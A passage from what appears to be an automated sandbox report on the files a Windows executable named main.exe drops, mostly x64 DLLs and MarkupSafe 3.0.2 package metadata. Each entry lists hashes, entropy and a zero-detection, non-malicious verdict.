                                                                                                                                                                                                                                                      SHA-256:C2FD98C677436260ACB9147766258CB99780A007114AED37C87893DF1CF1A717
                                                                                                                                                                                                                                                      SHA-512:0317B65D8F292332C5457A6B15A77548BE5B2705F34BB8F4415046E3E778580ABD17B233E6CC2755C991247E0E65B27B5634465646715657B246483817CACEB7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...V..f.........." ................P.....................................................`..........................................8.......9..d....`.......P..|............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......."..............@..@.data........@.......0..............@....pdata..|....P.......2..............@..@.rsrc........`.......6..............@..@.reloc..(....p.......8..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):36352
                                                                                                                                                                                                                                                      Entropy (8bit):5.913843738203007
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:dspbXtHQY4ubrttQza9CHnZXQsnecAlOF0qZLAXxQI3Sya6XPpMg3Yx8MnDcCPSq:7Y44UagH6cAFCLUSYpMg3YDzPo5kG9G
                                                                                                                                                                                                                                                      MD5:EF472BA63FD22922CA704B1E7B95A29E
                                                                                                                                                                                                                                                      SHA1:700B68E7EF95514D5E94D3C6B10884E1E187ACD8
                                                                                                                                                                                                                                                      SHA-256:66EEF4E6E0CEEEF2C23A758BFBEDAE7C16282FC93D0A56ACAFC40E871AC3F01C
                                                                                                                                                                                                                                                      SHA-512:DC2060531C4153C43ABF30843BCB5F8FA082345CA1BB57F9AC8695EDDB28FF9FDA8132B6B6C67260F779D95FCADCAE2811091BCA300AB1E041FAE6CC7B50ABD8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...|...5...}...~...U...,...u...,...v...,...}.......|............._.............Rich~...................PE..d...^..f.........." .....`...0......`.....................................................`..........................................~..|...L...d...............<...............(....q...............................q..8............p..(............................text...X^.......`.................. ..`.rdata.......p.......d..............@..@.data................x..............@....pdata..<...........................@..@.rsrc...............................@..@.reloc..(...........................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):12288
                                                                                                                                                                                                                                                      Entropy (8bit):4.735350805948923
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:rhsC3eqv6b0q3OQ3rHu5bc64OhD2I/p3cqgONLg:r/Hq3jHuY64OhDJJgONLg
                                                                                                                                                                                                                                                      MD5:3B1CE70B0193B02C437678F13A335932
                                                                                                                                                                                                                                                      SHA1:063BFD5A32441ED883409AAD17285CE405977D1F
                                                                                                                                                                                                                                                      SHA-256:EB2950B6A2185E87C5318B55132DFE5774A5A579259AB50A7935A7FB143EA7B1
                                                                                                                                                                                                                                                      SHA-512:0E02187F17DFCFD323F2F0E62FBFE35F326DCF9F119FC8B15066AFAEEE4EB7078184BC85D571B555E9E67A2DD909EC12D8A67E3D075E9B1283813EF274E05C0D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^:.6?T.6?T.6?T.?G..2?T.dJU.4?T.}GU.5?T.6?U..?T.dJQ.<?T.dJP.>?T.dJW.5?T..J\.7?T..JT.7?T..J..7?T..JV.7?T.Rich6?T.........................PE..d...Z..f.........." ................P.....................................................`..........................................8..d....8..d....`.......P..4............p..(....1...............................1..8............0...............................text...H........................... ..`.rdata..0....0......................@..@.data........@.......&..............@....pdata..4....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..(....p......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):22528
                                                                                                                                                                                                                                                      Entropy (8bit):5.705606408072877
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:19BcRxBmau38CYIl9bhgIW0mvufueNr359/tjGGDEFSegqrA:NcRy38J+9dmvufFtaGDV
                                                                                                                                                                                                                                                      MD5:FF33C306434DEC51D39C7BF1663E25DA
                                                                                                                                                                                                                                                      SHA1:665FCF47501F1481534597C1EAC2A52886EF0526
                                                                                                                                                                                                                                                      SHA-256:D0E3B6A2D0E073B2D9F0FCDB051727007943A17A4CA966D75EBA37BECDBA6152
                                                                                                                                                                                                                                                      SHA-512:66A909DC9C3B7BD4050AA507CD89B0B3A661C85D33C881522EC9568744953B698722C1CBFF093F9CBCD6119BD527FECAB05A67F2E32EC479BE47AFFA4377362C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...\..f.........." .....6...$......P.....................................................`.........................................`Y......`Z..d............p..................(....R..............................0R..8............P...............................text...(5.......6.................. ..`.rdata.......P.......:..............@..@.data........`.......J..............@....pdata.......p.......P..............@..@.rsrc................T..............@..@.reloc..(............V..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):70656
                                                                                                                                                                                                                                                      Entropy (8bit):6.0189903352673655
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:Jfju4GgRMgWWnEDZiECgd/iwOXUQdbhov0Clb8Cx4hpK8ithLFIDullRPwDHxXOa:pXRMgWiEDZiECgd/iwOXUQdbhov0ClbU
                                                                                                                                                                                                                                                      MD5:F267BF4256F4105DAD0D3E59023011ED
                                                                                                                                                                                                                                                      SHA1:9BC6CA0F375CE49D5787C909D290C07302F58DA6
                                                                                                                                                                                                                                                      SHA-256:1DDE8BE64164FF96B2BAB88291042EB39197D118422BEE56EB2846E7A2D2F010
                                                                                                                                                                                                                                                      SHA-512:A335AF4DBF1658556ED5DC13EE741419446F7DAEC6BD2688B626A803FA5DD76463D6367C224E0B79B17193735E2C74BA417C26822DAEEF05AC3BAB1588E2DE83
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...|...5...}...~...U...,...u...,...v...,...}.......|............._.............Rich~...................PE..d...\..f.........." .........8......`........................................P............`.............................................0.......d....0....... ..$............@..(.......................................8............................................text...8........................... ..`.rdata..............................@..@.data...............................@....pdata..$.... ......................@..@.rsrc........0......................@..@.reloc..(....@......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):770560
                                                                                                                                                                                                                                                      Entropy (8bit):7.613224993327352
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12288:XtIrHoxJ8gf1266y8IXhJvCKAmqVLzcrZgYIMGv1iLD9yQvG6h:XtIrHoxJFf1p34hcrn5Go9yQO6
                                                                                                                                                                                                                                                      MD5:1EFD7F7CB1C277416011DE6F09C355AF
                                                                                                                                                                                                                                                      SHA1:C0F97652AC2703C325AB9F20826A6F84C63532F2
                                                                                                                                                                                                                                                      SHA-256:AB45FA80A68DB1635D41DC1A4AAD980E6716DAC8C1778CB5F30CDB013B7DF6E6
                                                                                                                                                                                                                                                      SHA-512:2EC4B88A1957733043BBD63CEAA6F5643D446DB607B3267FAD1EC611E6B0AF697056598AAC2AE5D44AB2B9396811D183C32BCE5A0FF34E583193A417D1C5226B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........s.. .. .. ... .. ..!.. ..!.. .. .. ..!.. ..!.. ..!.. \..!.. \..!.. \.r .. \..!.. Rich.. ................PE..d...[..f.........." ................`.....................................................`.............................................h.......d...............................0......................................8...............(............................text............................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..0...........................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):26112
                                                                                                                                                                                                                                                      Entropy (8bit):5.8551858881598795
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:BczadRwoF2MZ81n0XTyMCYIl9bhgIW0mv8aeadRcwRwftjGLD2pRQNgQQ77k:2udRf2MuMJ+9dmv8aea34taLDcfQ
                                                                                                                                                                                                                                                      MD5:C5FB377F736ED731B5578F57BB765F7A
                                                                                                                                                                                                                                                      SHA1:5BA51E11F4DE1CAEDEBA0F7D4D10EC62EC109E01
                                                                                                                                                                                                                                                      SHA-256:32073DF3D5C85ABCE7D370D6E341EF163A8350F6A9EDC775C39A23856CCFDD53
                                                                                                                                                                                                                                                      SHA-512:D361BCDAF2C700D5A4AC956D96E00961432C05A1B692FC870DB53A90F233A6D24AA0C3BE99E40BD8E5B7C6C1B2BCDCDCFC545292EF321486FFC71C5EA7203E6A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...]..f.........." .....B...&......P.....................................................`..........................................i..0....k..d...............................(... b..............................@b..8............`...............................text....A.......B.................. ..`.rdata..P....`.......F..............@..@.data........p.......V..............@....pdata...............^..............@..@.rsrc................b..............@..@.reloc..(............d..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):84992
                                                                                                                                                                                                                                                      Entropy (8bit):6.064677498000638
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:BrYNvxcZeLrIeNs2qkTwe57DsuP45PqAqVDK9agdUiwOXyQdDrov0slb8gx4TBKW:Br4vxcZeLrIeN1TvHsuP45yAqVDK9ag3
                                                                                                                                                                                                                                                      MD5:8A0C0AA820E98E83AC9B665A9FD19EAF
                                                                                                                                                                                                                                                      SHA1:6BF5A14E94D81A55A164339F60927D5BF1BAD5C4
                                                                                                                                                                                                                                                      SHA-256:4EE3D122DCFFE78E6E7E76EE04C38D3DC6A066E522EE9F7AF34A09649A3628B1
                                                                                                                                                                                                                                                      SHA-512:52496AE7439458DEDB58A65DF9FFDCC3A7F31FC36FE7202FB43570F9BB03ABC0565F5EF32E5E6C048ED3EBC33018C19712E58FF43806119B2FB5918612299E7E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...|...5...}...~...U...,...u...,...v...,...}.......|............._.............Rich~...................PE..d...^..f.........." .........8......`.....................................................`..........................................C..h...HE..d....p.......`..l...............(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......4..............@....pdata..l....`.......>..............@..@.rsrc........p.......H..............@..@.reloc..(............J..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):10240
                                                                                                                                                                                                                                                      Entropy (8bit):4.675380950473425
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:frQRpBddzAvzrqTOy/ThIz014mlxuLnkC75JiSBhsPeSztllIDpqf4AZaRcX6gnO:Qddz2KTnThIz0qfteRIDgRWcqgnCWt
                                                                                                                                                                                                                                                      MD5:44B930B89CE905DB4716A548C3DB8DEE
                                                                                                                                                                                                                                                      SHA1:948CBFF12A243C8D17A7ACD3C632EE232DF0F0ED
                                                                                                                                                                                                                                                      SHA-256:921C2D55179C0968535B20E9FD7AF55AD29F4CE4CF87A90FE258C257E2673AA5
                                                                                                                                                                                                                                                      SHA-512:79DF755BE8B01D576557A4CB3F3200E5EE1EDE21809047ABB9FF8D578C535AC1EA0277EDA97109839A7607AF043019F2C297E767441C7E11F81FDC87FD1B6EFC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d...X..f.........." ................P........................................p............`.........................................@'..|....'..P....P.......@...............`..(....!...............................!..8............ ...............................text............................... ..`.rdata....... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..(....`.......&..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):10240
                                                                                                                                                                                                                                                      Entropy (8bit):4.625428549874022
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:flipBddzAvzrqTOy/ThIz014mlxuLnkC75JiSBhsPeSzteXuDVZqYNIfcX6gHCWx:Cddz2KTnThIz0qfteR5DVwYkcqgHCWt
                                                                                                                                                                                                                                                      MD5:F24F9356A6BDD29B9EF67509A8BC3A96
                                                                                                                                                                                                                                                      SHA1:A26946E938304B4E993872C6721EB8CC1DCBE43B
                                                                                                                                                                                                                                                      SHA-256:034BB8EFE3068763D32C404C178BD88099192C707A36F5351F7FDB63249C7F81
                                                                                                                                                                                                                                                      SHA-512:C4D3F92D7558BE1A714388C72F5992165DD7A9E1B4FA83B882536030542D93FDAD9148C981F76FFF7868192B301AC9256EDB8C3D5CE5A1A2ACAC183F96C1028B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d...Z..f.........." ................P........................................p............`......................................... '..t....'..P....P.......@...............`..(....!...............................!..8............ ...............................text...h........................... ..`.rdata..`.... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..(....`.......&..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4
                                                                                                                                                                                                                                                      Entropy (8bit):1.5
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Mn:M
                                                                                                                                                                                                                                                      MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                                      SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                                      SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                                      SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:pip.
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1503
                                                                                                                                                                                                                                                      Entropy (8bit):5.133773234982206
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:zUnzuObOVprYFT7JPprYFTsQYl9BiZ9ws43z5EBkuFN8WROm32si/yxtafyQ3toC:pIOVprYJNprYJSAD743LG32sQEtXQ3tf
                                                                                                                                                                                                                                                      MD5:779964CD6648AA66466FB0D1A9629339
                                                                                                                                                                                                                                                      SHA1:FC9C6859D60126F53FEC0DC6C145063013C30724
                                                                                                                                                                                                                                                      SHA-256:4631EC0DB5FD90A547E336817264C6798214338146F8AC94B4A57F96EE8C9EC4
                                                                                                                                                                                                                                                      SHA-512:6728DF7E3CED050809E1DEFF9573D838A846E1B01D00F7B49386A657C4F887A0E14CDF5DE91A7E1498647E3D452D0664381B4F9A02CC56A8EDE892FE11614D33
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Copyright 2010 Pallets....Redistribution and use in source and binary forms, with or without..modification, are permitted provided that the following conditions are..met:....1. Redistributions of source code must retain the above copyright.. notice, this list of conditions and the following disclaimer.....2. Redistributions in binary form must reproduce the above copyright.. notice, this list of conditions and the following disclaimer in the.. documentation and/or other materials provided with the distribution.....3. Neither the name of the copyright holder nor the names of its.. contributors may be used to endorse or promote products derived from.. this software without specific prior written permission.....THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS.."AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A..PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL TH
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4067
                                                                                                                                                                                                                                                      Entropy (8bit):5.213437409146375
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:DU/JnBVJrYJtJrYJdM3a38lq42UkUQIQs0rEVmhTdYSkQbUY:8HnrsPrsdM3a3cqnjY0w0hTGSkQD
                                                                                                                                                                                                                                                      MD5:60CC921B7461A060DAB0456B6EFFFA68
                                                                                                                                                                                                                                                      SHA1:6300AA77A908333E3B1FF3EAB7D21CAAD23A2816
                                                                                                                                                                                                                                                      SHA-256:9E1A1A6E3BA9046E358FF2713C2277CA582B67A171F2830215B88B17D29A7EA7
                                                                                                                                                                                                                                                      SHA-512:5F82B171ECDE9CB7D0272B324B4364F9B7D5A36980D1C7F7927E5DEE8E3609C856EF4EB5A1570BDB81468A690FDEE4C7B53AD0DFA0872B1503C61E3CB5CA6011
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Metadata-Version: 2.1..Name: MarkupSafe..Version: 3.0.2..Summary: Safely add untrusted strings to HTML/XML markup...Maintainer-email: Pallets <contact@palletsprojects.com>..License: Copyright 2010 Pallets.. .. Redistribution and use in source and binary forms, with or without.. modification, are permitted provided that the following conditions are.. met:.. .. 1. Redistributions of source code must retain the above copyright.. notice, this list of conditions and the following disclaimer... .. 2. Redistributions in binary form must reproduce the above copyright.. notice, this list of conditions and the following disclaimer in the.. documentation and/or other materials provided with the distribution... .. 3. Neither the name of the copyright holder nor the names of its.. contributors may be used to endorse or promote products derived from.. this software without
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:CSV text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1095
                                                                                                                                                                                                                                                      Entropy (8bit):5.8868247049574105
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:p30n/2zDe0vCWPG0YJK/n0gw0IB0lWwk7q7Gq5DtC4ntjYR2oHlFw9gVStvWJV:J0nuXe0aWPG0+qn0gw0K0lQQRq4t0R2i
                                                                                                                                                                                                                                                      MD5:3CB854C46E9DECE3E932DE4FCF4A2780
                                                                                                                                                                                                                                                      SHA1:C7E7962F9BA09AEC237A2F9A4C214DCAC25B2142
                                                                                                                                                                                                                                                      SHA-256:430B80979C73C53C64201BB5A0FC5C63845ABFDFBA29EA03CEB836B6ED77992D
                                                                                                                                                                                                                                                      SHA-512:393C112444D075476A05B60A698210F70D0E336633B4365CA85C01AEAB6B89488832F12F3C3BA1D18C8E5845C1D4D480C81E58FDFF0DB459A6B3BDBDBE313C02
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MarkupSafe-3.0.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..MarkupSafe-3.0.2.dist-info/LICENSE.txt,sha256=RjHsDbX9kKVH4zaBcmTGeYIUM4FG-KyUtKV_lu6MnsQ,1503..MarkupSafe-3.0.2.dist-info/METADATA,sha256=nhoabjupBG41j_JxPCJ3ylgrZ6Fx8oMCFbiLF9Kafqc,4067..MarkupSafe-3.0.2.dist-info/RECORD,,..MarkupSafe-3.0.2.dist-info/WHEEL,sha256=tE2EWZPEv-G0fjAlUUz7IGM64246YKD9fpv4HcsDMkk,101..MarkupSafe-3.0.2.dist-info/top_level.txt,sha256=qy0Plje5IJuvsCBjejJyhDCjEAdcDLK_2agVcex8Z6U,11..markupsafe/__init__.py,sha256=pREerPwvinB62tNCMOwqxBS2YHV6R52Wcq1d-rB4Z5o,13609..markupsafe/__pycache__/__init__.cpython-311.pyc,,..markupsafe/__pycache__/_native.cpython-311.pyc,,..markupsafe/_native.py,sha256=2ptkJ40yCcp9kq3L1NqpgjfpZB-obniYKFFKUOkHh4Q,218..markupsafe/_speedups.c,sha256=SglUjn40ti9YgQAO--OgkSyv9tXq9vvaHyVhQows4Ok,4353..markupsafe/_speedups.cp311-win_amd64.pyd,sha256=-5qfBr0xMpiTRlH9hFg_7Go9PHi7z5guMzmbbmZI3Xw,13312..markupsafe/_speedups.pyi,sha256=LSDmXYOefH4HVpAXuL8sl7AttLw
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):101
                                                                                                                                                                                                                                                      Entropy (8bit):5.028731013591746
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:RtEeXMRYFAQ3VMSgP+tkKcfxLQLn:RtC12VAWK5NQLn
                                                                                                                                                                                                                                                      MD5:C45C8E16945267D2E57AB615D7DE704D
                                                                                                                                                                                                                                                      SHA1:017434CC3950C6E4CDD18C90974AC4002F062D26
                                                                                                                                                                                                                                                      SHA-256:B44D845993C4BFE1B47E3025514CFB20633AE36E3A60A0FD7E9BF81DCB033249
                                                                                                                                                                                                                                                      SHA-512:3609FCBB3C9E28003DCA1BCF32EC082146954A75D673AF3B8E27449D9504A4CA197EE1C64F812DF6E6D95BDDAB5160B5EB6C3D61B0FD870701E23FD78B88D600
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Wheel-Version: 1.0.Generator: setuptools (75.2.0).Root-Is-Purelib: false.Tag: cp311-cp311-win_amd64..
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):11
                                                                                                                                                                                                                                                      Entropy (8bit):3.2776134368191165
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:5Pgn:1g
                                                                                                                                                                                                                                                      MD5:5862354C9FBB5B15204672C79808E25C
                                                                                                                                                                                                                                                      SHA1:F53E3E1C5D96F0C96145FD9477EA8DBD30ACEB7B
                                                                                                                                                                                                                                                      SHA-256:AB2D0F9637B9209BAFB020637A32728430A310075C0CB2BFD9A81571EC7C67A5
                                                                                                                                                                                                                                                      SHA-512:08123B4AC8551787F74F03A452BC0B78D6FFA709C072F9265B4A0D2485CC465CC4667282273415E0841CAAE49565D26CB5AFBF7124E870A26CC89C7CD517FC7A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:markupsafe.
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2348032
                                                                                                                                                                                                                                                      Entropy (8bit):6.507217190946273
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:49152:GH3voy7XzO1XXKU4aCM7iEPs2UkcEFCkXRKhf:S5S5CbEPs2UkcIR
                                                                                                                                                                                                                                                      MD5:F915AE75CB21D59B5945B90C65DE2E4F
                                                                                                                                                                                                                                                      SHA1:C52BE4CE7D8730B86C5D15ABE8E239B4A57423F1
                                                                                                                                                                                                                                                      SHA-256:B0A0BC66A68AC7DFA2343D904563E644DE76D0AC14AFF0CA87804351977B0C43
                                                                                                                                                                                                                                                      SHA-512:05FAE28E77026DB9A446238300A226F0AF999B172B77CE80EA41B116174D1BA411FC94E233516527F1DCF53830AC39CDD82997CC3D632FCA4C0A9CEAAF352888
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c.6.'.XK'.XK'.XK...K7.XK7.YJ%.XK7..K#.XK7.[J#.XK7.\J/.XK7.]J).XKH.YJ%.XKl.YJ .XK'.YK+.XK'.XK<.XKo.\J..XKo.PJm.XKo.XJ&.XKo..K&.XKo.ZJ&.XKRich'.XK........PE..d...C..g.........." ...).D...................................................P$...........`..........................................U".`....V"...... $...... #.<............0$.......!.......................!.(...`.!.@............`..H............................text...(C.......D.................. ..`.rdata..(....`.......H..............@..@.data........."..b...\".............@....pdata..<.... #.......".............@..@.rsrc........ $.......#.............@..@.reloc.......0$.......#.............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):264192
                                                                                                                                                                                                                                                      Entropy (8bit):6.270986211983934
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6144:EP41y0ekP31Q6SjRI7OghnznLg9uP1+74/LgHmPr9qvZqhLaHLTLrLfqeqwLQH6P:EPv0d1BhnznLg9uP1+74/LgHmPr9qvZ3
                                                                                                                                                                                                                                                      MD5:61320942BD13D8D5769AC3E6CC391920
                                                                                                                                                                                                                                                      SHA1:89FB3F6D306846780B8AD134232C90AC9B746DDF
